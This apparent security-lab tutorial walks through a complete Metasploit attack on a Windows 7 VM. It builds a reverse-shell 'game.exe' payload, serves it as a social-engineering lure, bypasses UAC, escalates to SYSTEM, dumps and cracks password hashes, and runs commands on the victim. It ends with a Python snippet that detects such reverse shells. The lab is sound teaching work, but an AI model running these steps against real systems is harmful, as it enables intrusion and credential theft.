ComputerSecurityStudent (CSS)

(Metasploit: msfpayload backdoor)

{ BackTrack5R1: Create Executable, Get SYSTEM & Password On Windows 7 }


Section 0. Background Information
  1. What is Metasploit?
    • The Metasploit Framework is an open source penetration testing tool used for developing and executing exploit code against a remote target machine. Metasploit has the world's largest database of public, tested exploits. In simple words, Metasploit can be used to test the vulnerability of computer systems in order to protect them; on the other hand, it can also be used to break into remote systems.
     
  2. What is John the Ripper?
    • John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes.

  3. Background 
    • This lab illustrates two unfortunate scenarios. 
    • First, the regular user IDs that we use for our daily computer activities (surfing, word processing, etc.) should not have Administrative Privileges. 
    • Second, downloading and playing games from a web link can get extremely dangerous in a hurry. 
    • Together, these two scenarios create a perfect storm that lets an attacker (1) maliciously send a link out to many victims, (2) gain access to their machines, and (3) basically do whatever they want. 

  4. Pre-Requisite Lab
    1. BackTrack: Lesson 1: Installing BackTrack 5 R1
    2. Windows 7: Lesson 1: Installing Windows 7
     
  5. Lab Notes
    • In this lab we will do the following:
      1. Create an executable with msfpayload
      2. Place the executable on an Apache Web Server
      3. Establish a Metasploit Listener
      4. Use Meterpreter to gain SYSTEM Privileges
      5. Use Meterpreter to gain Password Hashes
      6. Use John the Ripper to crack Password Hashes
      7. Use Meterpreter to execute commands
      8. Use Meterpreter shell to display a system message

  6. Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC § 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • You are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
    • © 2014 No content replication of any kind is allowed without express written permission.

 

Section 1. Start your Windows 7 VM
  1. Edit Virtual Machine Settings
    • Instructions
      1. Click on Windows 7
      2. Click on Edit virtual machine

     

  2. Configure Network Adapter
    • Instructions
      1. Select Network Adapter
      2. Click the radio button "Bridged: Connected directly to the physical network."
      3. Click the Okay button

     

  3. Start Windows 7
    • Instructions
      1. Click on Windows 7
      2. Click on Play virtual machine

     

Section 2. Login to Windows 7
  1. Login
    • Instructions:
      1. Enter Password
      2. Click the Blue Arrow

 

Section 3. Verify you have a Network IP Address
  1. Bring up Command Prompt
    • Instructions:
      1. Click the Start Button
      2. Type "cmd" in the search box
      3. Right Click on cmd
      4. Click on "Run as administrator"

     

  2. User Account Control
    • Instructions:
      1. Click the Yes Button

     

  3. Verify IP Address
    • Instructions:
      1. ipconfig
    • Notes(FYI):
      1. In my case, my IP Address is 192.168.1.106.
      2. In your case, your IP Address will be different.

 

Section 4. Create Un-Safe Password
  1. Bring up Command Prompt
    • Instructions:
      1. net users
      2. net users student abc123
      3. net users Administrator 123456
    • Notes(FYI):
      1. You can use the net user command to create and modify user accounts on computers. When you use this command without command-line switches, the user accounts for the computer are listed.
      2. Set the password to "abc123" for the student userid.
      3. Set the password to "123456" for the Administrator userid.

 

Section 5. Configure BackTrack Virtual Machine Settings
  1. Edit the BackTrack5R1 VM
    • Instructions:
      1. Select BackTrack5R1 VM
      2. Click Edit virtual machine settings

     

  2. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Network Adapter
      2. Click on the Bridged Radio button
      3. Click on the OK Button

 

Section 6. Play and Login to BackTrack
  1. Play the BackTrack5R1 VM
    • Instructions:
      1. Click on the BackTrack5R1 VM
      2. Click on Play virtual machine

     

  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.

     

  3. Bring up the GNOME
    • Instructions:
      1. Type startx

     

Section 7. Open Console Terminal and Retrieve IP Address
  1. Start up a terminal window (On BackTrack5R1)
    • Instructions:
      1. Click on the Terminal Window

     

  2. Obtain the IP Address
    • Instructions:
      1. ifconfig -a
    • Note(FYI):
      • My IP address 192.168.1.112.
      • In your case, it will probably be different.
      • This is the machine that will be used to attack the victim machine.

 

Section 8. Start Apache Web Server
  1. Start Apache
    • Instructions:
      1. service apache2 start
      2. ps -eaf | grep apache2 | grep -v grep
    • Notes(FYI):
      1. service apache2 start; This starts the Apache web service.
      2. ps -eaf | grep apache2; This shows all the running Apache processes.
      3. | grep -v grep; This ignores the grep process itself.

 

Section 9. Create msfpayload Backdoor
  1. Create the msfpayload
    • Instructions:
      1. msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.112 LPORT=4444 x > /var/www/game.exe
        • Replace 192.168.1.112 with BackTrack's IP address obtained from (Section 7, Step 2).
      2. ls -l /var/www/game.exe
      3. chmod 744 /var/www/game.exe
      4. ls -l /var/www/game.exe
    • Notes(FYI):
      • windows/meterpreter/reverse_tcp is the payload that msfpayload builds into the executable.
      • LHOST specifies the BackTrack server that the TCP traffic will be sent to.
      • LPORT specifies the port on that IP address that the TCP traffic will be sent to.

 

Section 10. Start msfconsole and listener
  1. Start msfconsole
    • Instructions:
      1. msfconsole

     

  2. Start Exploit listener
    • Notes(FYI):
      • Replace 192.168.1.112 with BackTrack's IP address obtained from (Section 7, Step 2).
    • Instructions:
      1. use exploit/multi/handler
      2. set PAYLOAD windows/meterpreter/reverse_tcp
      3. set LHOST 192.168.1.112
        • Replace 192.168.1.112 with BackTrack's IP address obtained from (Section 7, Step 2).
      4. set LPORT 4444
      5. exploit
      6. Continue to the next section!!!

 

Section 11. Start Internet Explorer
  1. Start Internet Explorer (On the Windows 7 VM)
    • Instructions:
      1. Click the Start Button
      2. Type "Internet Explorer" in the search box
      3. Click Internet Explorer

     

  2. Run Game
    • Instructions:
      1. Place the following link in the Address Bar
        • http://192.168.1.112/game.exe
        • Replace 192.168.1.112 with BackTrack's IP address obtained from (Section 7, Step 2).
      2. Click the Run Button
    • Notes(FYI):
      1. This is where the social engineering could take place.  Imagine a scenario where you get an email from a friend, with an embedded link that says click here to play this new game.

     

  3. Internet Explorer - Security Warning
    • Instructions:
      1. Click Run
      2. Continue to Next Section
    • Notes(FYI):
      1. Notice this is an "Internet Explorer - Security Warning", which does not trip the Windows Firewall.

     

Section 12. Meterpreter Reconnaissance 
  1. Get System Information
    • Instructions:
      1. sysinfo
    • Note(FYI):
      1. sysinfo consists of the following: Computer Name, Operating System, Hardware Architecture, and System Language.

     

  2. Get UserID
    • Instructions:
      1. getuid
    • Note(FYI):
      1. getuid provides the username.

 

Section 13. Escalate User Privilege 
  1. Viewing Sessions
    • Instructions:
      1. background
      2. sessions -l
        • "l" as in lamb.
    • Note(FYI):
      1. Using the background command places the current session into the background and brings us back to the Metasploit console without terminating the session.
      2. sessions -l allows a user to view all the established Metasploit sessions.

     

  2. Bypass UAC
    • Instructions:
      1. use post/windows/escalate/bypassuac
      2. show options
      3. set LHOST 192.168.1.112
        • Replace 192.168.1.112 with BackTrack's IP address obtained from (Section 7, Step 2).
      4. set SESSION 1
        • "1" as in the number one.
      5. run
    • Note(FYI):
      1. This is a post-exploitation module that bypasses UAC (User Account Control) protection, so that a later getsystem can succeed.

     

  3. Get SYSTEM
    • Instructions:
      1. Press <Enter>
      2. sessions -l
        • "l" as in lamb.
      3. sessions -i 2
      4. getuid
        • Notice the username is student.
      5. getsystem
      6. getuid
        • Notice the username is now SYSTEM, which has Administrator privileges.
    • Note(FYI):
      1. The 'getsystem' command allows you to escalate the current session to the SYSTEM account from an administrator user account.
      2. This is why your general user account should not have administrative privileges.

 

Section 14. Display Password Hashes 
  1. Show Processes
    • Instructions:
      1. ps
      2. Record the PID for winlogon.exe.  Mine is 448.
    • Note(FYI):
      1. ps displays all the system processes, similar to the Windows tasklist.exe.

     

  2. Run Hashdump
    • Instructions:
      1. migrate 448
        • Replace 448 with your winlogon.exe process ID obtained from the previous step.
      2. run hashdump
      3. Highlight the password hashes, Then Right Click
      4. Click Copy

     

  3. Open gedit
    • Instructions:
      1. Applications --> Accessories --> gedit Text Editor

     

  4. Paste Hash
    • Instructions:
      1. Edit --> Paste

     

  5. Save File
    • Instructions:
      1. File --> Save As...
      2. Name: windows7_hash.txt
      3. Click the Save Button

     

  6. Close File
    • Instructions:
      1. File --> Close

 

Section 15. Crack Password Hashes with "John the Ripper" 
  1. Start up a terminal window (On BackTrack5R1)
    • Instructions:
      1. Click on the Terminal Window
    • Note(FYI):
      1. It's not necessary to create another terminal window.
      2. It's nice, however, to separate your Metasploit sessions from your John the Ripper work.
     
  2. John The Ripper
    • Instructions:
      1. /pentest/passwords/john/john --format=NT /root/windows7_hash.txt
    • Notes(FYI):
      1. John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords.

 

Section 16. Execute Windows Commands from Metasploit 
  1. Execute Windows Commands (On BackTrack5R1)
    • Instructions:
      1. execute -f calc.exe
      2. execute -f cmd.exe
    • Notes(FYI):
      1. The above command will pop up a calculator and command prompt on the Windows 7 Victim.

     

  2. Viewing Executed Windows Commands (On the Windows 7 VM)
    • Note(FYI):
      1. You should see both a calculator and command prompt.

 

Section 17. Execute Windows System Message 
  1. Execute Windows System Message (On the BackTrack VM)
    • Instructions:
      1. shell
      2. msg * You have been hacked... zProfess0R
    • Note(FYI):
      1. The "shell" command essentially provides you with a Windows command prompt on the victim.

     

  2. View Windows System Message (On the Windows 7 VM)
    • Note(FYI):
      1. You should see a Windows message stating "You have been hacked... zProfess0R"

 

Section 18. Basic Network Forensics 
  1. Basic Network Forensics (On the BackTrack VM)
    • Instructions:
      1. netstat -nao
    • Notes(FYI):
      1. Notice the ESTABLISHED Metasploit Session (See Below)

 

Section 19. Proof of Lab
  1. Proof of Lab (Basic Process Forensics)
    • Notes(FYI):
      1. See picture before running commands
    • Instructions:
      1. netstat -nao | findstr ":4444"
      2. tasklist | findstr "3300"
        • Replace 3300 with the first process ID returned by netstat.
      3. tasklist | findstr "2168"
        • Replace 2168 with the second process ID returned by netstat.
      4. date /t
      5. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • e.g., echo "John Gray"
    • Proof of Lab Instructions:
      1. Do a PrtScn
      2. Paste into a word document
      3. Upload to Moodle
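The correlation the two commands above do by hand (netstat -nao to find the ESTABLISHED connection to port 4444, tasklist to learn which image owns that PID) is automated below. This is an added example, not part of the original lab; the netstat and tasklist output it parses is constructed to resemble the lab's victim (PIDs 3300 and 2168 and the image names are assumptions), and the final check flags the case the migrate step creates: a Windows system process such as winlogon.exe holding an outbound connection.

```python
import re
from collections import namedtuple

Conn = namedtuple("Conn", "proto local remote state pid")

# Constructed sample of `netstat -nao` on the Windows 7 victim (not real capture)
NETSTAT_SAMPLE = """
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       700
  TCP    192.168.1.106:49160    192.168.1.112:4444     ESTABLISHED     3300
  TCP    192.168.1.106:49161    192.168.1.112:4444     ESTABLISHED     2168
  TCP    192.168.1.106:49162    192.168.1.1:80         TIME_WAIT       0
  UDP    0.0.0.0:5355           *:*                                    1004
"""

# Constructed sample of `tasklist` on the same host (image names are assumptions)
TASKLIST_SAMPLE = """
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0 Services                   0         24 K
winlogon.exe                  2168 Console                    1      2,844 K
game.exe                      3300 Console                    1     11,412 K
cmd.exe                       3412 Console                    1      2,100 K
"""

# Images that should never own an outbound connection to an arbitrary host
SYSTEM_IMAGES = {"winlogon.exe", "lsass.exe", "csrss.exe", "services.exe"}

def parse_netstat(text):
    """Return TCP rows from netstat -nao output as Conn tuples."""
    rows = [line.split() for line in text.splitlines()]
    return [Conn(p[0], p[1], p[2], p[3], int(p[4])) for p in rows
            if len(p) == 5 and p[0] == "TCP"]

def parse_tasklist(text):
    """Map PID -> image name from tasklist output (image names may contain spaces)."""
    pat = re.compile(r"^(\S.*?)\s+(\d+)\s+\S+\s+\d+\s+[\d,]+ K\s*$")
    pids = {}
    for line in text.splitlines():
        m = pat.match(line)
        if m:
            pids[int(m.group(2))] = m.group(1).strip()
    return pids

def find_reverse_shells(netstat_text, tasklist_text, port=4444):
    """(pid, image, remote) for each ESTABLISHED TCP connection to the given remote port."""
    images = parse_tasklist(tasklist_text)
    return [(c.pid, images.get(c.pid, "<unknown>"), c.remote)
            for c in parse_netstat(netstat_text)
            if c.state == "ESTABLISHED" and c.remote.rsplit(":", 1)[1] == str(port)]

def flag_system_process_hits(hits):
    """Keep only hits owned by a core Windows process: the signature of a migrated session."""
    return [h for h in hits if h[1].lower() in SYSTEM_IMAGES]
```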

     

  2. Terminate Metasploit Session
    • Instructions:
      1. exit
      2. exit -y
      3. exit -y

     
